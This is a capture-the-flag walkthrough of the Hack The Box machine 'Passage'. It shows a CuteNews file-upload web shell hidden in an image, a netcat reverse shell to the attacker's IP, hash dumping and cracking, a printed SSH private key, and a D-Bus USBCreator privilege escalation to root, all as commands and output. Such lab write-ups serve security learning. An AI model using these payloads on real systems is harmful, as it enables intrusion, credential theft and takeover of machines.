Hack-The-Box-walkthrough[passage]

introduce

OS: Linux
Difficulty: Medium
Points: 30
Release: 05 Sep 2020
IP: 10.10.10.206

User Blood qtc 00 days, 00 hours, 19 mins, 35 seconds.
Root Blood Lemming 00 days, 00 hours, 32 mins, 04 seconds.

  • my htb rank

information gathering

first use nmap as usaul

1
2
3
4
root@kali:~# nmap -sV -v -p- --min-rate=10000 10.10.10.206
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

from the page we know about NMS (News Management System) Cutenews.

1
Powered by CuteNews

After some googling, I found that we can visit the NMS panel after placing CuteNews on the web page.

1
http://10.10.10.206/CuteNews/

first regist then sign in,but nothing interesting,then got the version of CuteNews in the same page.

1
2
Powered by CuteNews 2.1.2 © 2002–2020 CutePHP.
(unregistered)

CVE – Arbitrary File Upload – www-data Shell

A simple Googling we found

  • CuteNews 2.0.3 - Arbitrary File Upload

Based on the reference above, we can upload a malicious JPG file containing malicious PHP code in it to cause RCE.

  • we can writeup our PHP code inside an image file using the ExifTool tool.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
root@kali:~/hackthebox/machine/passage# exiftool -comment='<?php echo system($_GET['cmd']); ?>' test.jpg
1 image files updated
root@kali:~/hackthebox/machine/passage# exiftool test.jpg
ExifTool Version Number : 12.04
File Name : test.jpg
Directory : .
File Size : 63 kB
File Modification Date/Time : 2020:09:07 01:59:53-04:00
File Access Date/Time : 2020:09:07 01:59:53-04:00
File Inode Change Date/Time : 2020:09:07 01:59:53-04:00
File Permissions : rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 72
Y Resolution : 72
Comment : <?php echo system($_GET[cmd]); ?>
Image Width : 780
Image Height : 1380
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 780x1380
Megapixels : 1.1

then change the extension to .php and register an account and upload it to the avatar section.

visit

1
http://10.10.10.206/CuteNews/index.php?mod=main&opt=personal

After saving changes, we can now able to visit the location of our uploaded PHP file.

1
http://10.10.10.206/CuteNews/uploads/avatar_lucifer_test.php?cmd=id

and we got the following on browser

1
uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)

After Some Enumeration found that NC is available in machiene.

executed this command to get a reverse shell

1
nc 10.10.14.4 4455 -e /bin/bash

and we got a reverse shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~# nc -lvp 4455
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4455
Ncat: Listening on 0.0.0.0:4455
Ncat: Connection from 10.10.10.206.
Ncat: Connection from 10.10.10.206:34760.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@passage:/var/www/html/CuteNews/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@passage:/var/www/html/CuteNews/uploads$ whoami
whoami
www-data

there is a lot of PHP files available to read. saved all the outputs to a single file and copied it to my machine.

1
2
3
4
5
6
7
www-data@passage:/var/www/html/CuteNews/cdata/users$ ls
ls
09.php 21.php 52.php 6e.php 7a.php b0.php d4.php fc.php
0a.php 32.php 5d.php 75.php 8f.php c8.php d5.php lines
16.php 49.php 66.php 77.php 97.php ca.php d6.php users.txt
www-data@passage:/var/www/html/CuteNews/cdata/users$ cat * > output.txt
cat * > output.txt

base64 decode those strings, got 7 SHA2-256 Hashes. use Hashcat to crack this against with rockyou.txt file.

1
2
3
4
5
6
7
7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1
4bdd0a0bb47fc9f66cbf1a8982fd2d344d2aec283d1afaebb4653ec3954dff88
e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca
6e9d6c8d194aad647a7b5e1ecd47c7ca24f042a772fb3802e4b81e6043d67817
4db1f0bfd63be058d4ab04f18f65331ac11bb494b5792c480faf7fb0c40fa9cc
e7d3685715939842749cc27b38d0ccb9706d4d14a5304ef9eee093780eab5df9
1
hashcat64.exe -m 1400 -a 0 output.txt rockyou.txt

and we cracked 2 hashes:

1
2
e7d3685715939842749cc27b38d0ccb9706d4d14a5304ef9eee093780eab5df9:hacker
e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd:atlanta1

SSH is not allowed to log in with Password. So I tried to SU into Paul.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
username : paul
password : atlanta1

www-data@passage:/var/www/html/CuteNews/cdata/users$ su paul
su paul
Password: atlanta1

paul@passage:/var/www/html/CuteNews/cdata/users$ cd ~
cd ~
paul@passage:~$ ls
ls
Desktop Downloads Music Public user.txt
Documents examples.desktop Pictures Templates Videos
paul@passage:~$ cat user.txt
cat user.txt
7b75a13dc30044026e830c894aaf83c0

and we got user.txt

got root

We Can Cat SSH Keys Of Nadav, because Nadav uses the same SSH key for Paul.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
paul@passage:~/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAs14rHBRld5fU9oL1zpIfcPgaT54Rb+QDj2oAK4M1g5PblKu/
+L+JLs7KP5QL0CINoGGhB5Q3aanfYAmAO7YO+jeUS266BqgOj6PdUOvT0GnS7M4i
Z2Lpm4QpYDyxrgY9OmCg5LSN26Px948WE12N5HyFCqN1hZ6FWYk5ryiw5AJTv/kt
rWEGu8DJXkkdNaT+FRMcT1uMQ32y556fczlFQaXQjB5fJUXYKIDkLhGnUTUcAnSJ
JjBGOXn1d2LGHMAcHOof2QeLvMT8h98hZQTUeyQA5J+2RZ63b04dzmPpCxK+hbok
sjhFoXD8m5DOYcXS/YHvW1q3knzQtddtqquPXQIDAQABAoIBAGwqMHMJdbrt67YQ
eWztv1ofs7YpizhfVypH8PxMbpv/MR5xiB3YW0DH4Tz/6TPFJVR/K11nqxbkItlG
QXdArb2EgMAQcMwM0mManR7sZ9o5xsGY+TRBeMCYrV7kmv1ns8qddMkWfKlkL0lr
lxNsimGsGYq10ewXETFSSF/xeOK15hp5rzwZwrmI9No4FFrX6P0r7rdOaxswSFAh
zWd1GhYk+Z3qYUhCE0AxHxpM0DlNVFrIwc0DnM5jogO6JDxHkzXaDUj/A0jnjMMz
R0AyP/AEw7HmvcrSoFRx6k/NtzaePzIa2CuGDkz/G6OEhNVd2S8/enlxf51MIO/k
7u1gB70CgYEA1zLGA35J1HW7IcgOK7m2HGMdueM4BX8z8GrPIk6MLZ6w9X6yoBio
GS3B3ngOKyHVGFeQrpwT1a/cxdEi8yetXj9FJd7yg2kIeuDPp+gmHZhVHGcwE6C4
IuVrqUgz4FzyH1ZFg37embvutkIBv3FVyF7RRqFX/6y6X1Vbtk7kXsMCgYEA1WBE
LuhRFMDaEIdfA16CotRuwwpQS/WeZ8Q5loOj9+hm7wYCtGpbdS9urDHaMZUHysSR
AHRFxITr4Sbi51BHUsnwHzJZ0o6tRFMXacN93g3Y2bT9yZ2zj9kwGM25ySizEWH0
VvPKeRYMlGnXqBvJoRE43wdQaPGYgW2bj6Ylt18CgYBRzSsYCNlnuZj4rmM0m9Nt
1v9lucmBzWig6vjxwYnnjXsW1qJv2O+NIqefOWOpYaLvLdoBhbLEd6UkTOtMIrj0
KnjOfIETEsn2a56D5OsYNN+lfFP6Ig3ctfjG0Htnve0LnG+wHHnhVl7XSSAA9cP1
9pT2lD4vIil2M6w5EKQeoQKBgQCMMs16GLE1tqVRWPEH8LBbNsN0KbGqxz8GpTrF
d8dj23LOuJ9MVdmz/K92OudHzsko5ND1gHBa+I9YB8ns/KVwczjv9pBoNdEI5KOs
nYN1RJnoKfDa6WCTMrxUf9ADqVdHI5p9C4BM4Tzwwz6suV1ZFEzO1ipyWdO/rvoY
f62mdwKBgQCCvj96lWy41Uofc8y65CJi126M+9OElbhskRiWlB3OIDb51mbSYgyM
Uxu7T8HY2CcWiKGe+TEX6mw9VFxaOyiBm8ReSC7Sk21GASy8KgqtfZy7pZGvazDs
OR3ygpKs09yu7svQi8j2qwc7FL6DER74yws+f538hI7SHBv9fYPVyw==
-----END RSA PRIVATE KEY-----

and now we are nadav

1
2
3
4
5
6
7
8
9
10
11
root@kali:~/hackthebox/machine/passage# ssh -i nadav-key nadav@10.10.10.206
load pubkey "nadav-key": invalid format
The authenticity of host '10.10.10.206 (10.10.10.206)' can't be established.
ECDSA key fingerprint is SHA256:oRyj2rNWOCrVh9SCgFGamjppmxqJUlGgvI4JSVG75xg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.206' (ECDSA) to the list of known hosts.
Last login: Mon Aug 31 15:07:54 2020 from 127.0.0.1
nadav@passage:~$ id
uid=1000(nadav) gid=1000(nadav) groups=1000(nadav),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
nadav@passage:~$ whoami
nadav

Dbus – USB Controller Privilege Escalation – Root

Listing all the process gave me a hint for Root.

1
2
nadav@passage:~$ ps -aux | grep usb 
nadav 3430 0.0 0.0 21264 1028 pts/19 S+ 00:14 0:00 grep --color=auto usb
  • reference to USBCreator D-Bus Privilege Escalation in Ubuntu Desktop

Pre Requirements:

  • The user must be in the Sudoers group. Here in our case, Nadav is in the Sudoers group.
  • The user must have executable privileges to the dbus tool.
1
2
nadav@passage:~$ find / -perm -u=s -type f 2>/dev/null | grep dbus
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

then We have everything we need.
it’s time to launch our attack. As we already know the dbus system block as com.ubuntu.USBCreator by default, we can send a system call to Dbus message.

1
2
3
nadav@passage:~$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMR1r7B7aiEe6j+wBsVumAFqFXCiqw2iSrcg1S7rC1BdlVqr8YfWnT6e/e3+TAJk9idtLz/wN2MkupWtI1ddtNTJz31RQb0WMGjq7p8Usg0uIYhQH0PTN/GmPXDhqLIPcbTnNQMcV2PnwM07eXxQH0+s9rqVO8cR2z2f35bKe3WrHNnT7NwfOoWqNJxh+V8OGgfF8LhS0E46I6co76MJAIsX24Zs9r/dY+JPOlJlS3K2Kf3xSfPAScQeWip1WYY9depVuQywk12kOUikzGNjlQ4phNba47VjfycyV34cLw0/vQcDv5hMCfaK+hoE5rBXysnVx/f3n3zRYMLomgveQUCLBYUwJPE2t0VzeeX4W9wxrAOl2Njx5TI4cEFnmlp/6lO/iK+aC6BSBRxU19jS2fUchiN9PMgLSYGzhuIxOLvvd9AlaOYPNM7a5AfjzzO+gd1fv/Mb9EIZCKibtvpHp0eomnSDcDz/b9FNpbvg6V5NBVy2VaufcRbiBDD6cTS00= root@kali" > ~/authorized_keys
nadav@passage:~$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/authorized_keys /root/.ssh/authorized_keys true
()

we did all the things without getting any errors. Let’s try to SSH into Root.

1
2
3
4
5
6
7
8
9
10
11
root@kali:~/hackthebox/machine/passage# chmod 600 id_rsa 
root@kali:~/hackthebox/machine/passage# ssh -i id_rsa root@10.10.10.206
Last login: Mon Aug 31 15:14:22 2020 from 127.0.0.1
root@passage:~# id
uid=0(root) gid=0(root) groups=0(root)
root@passage:~# whoami
root
root@passage:~# ls
artifacts files root.txt
root@passage:~# cat root.txt
5bceb602f952cda2b0db04c27331c2eb

then we got root and root.txt

Summary of knowledge

  • CuteNews 2.0.3 - Arbitrary File Upload
  • writeup PHP code inside an image file
  • hashcat crack SHA2-256 Hashes
  • Dbus – USB Controller Privilege Escalation

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…

Welcome to my other publishing channels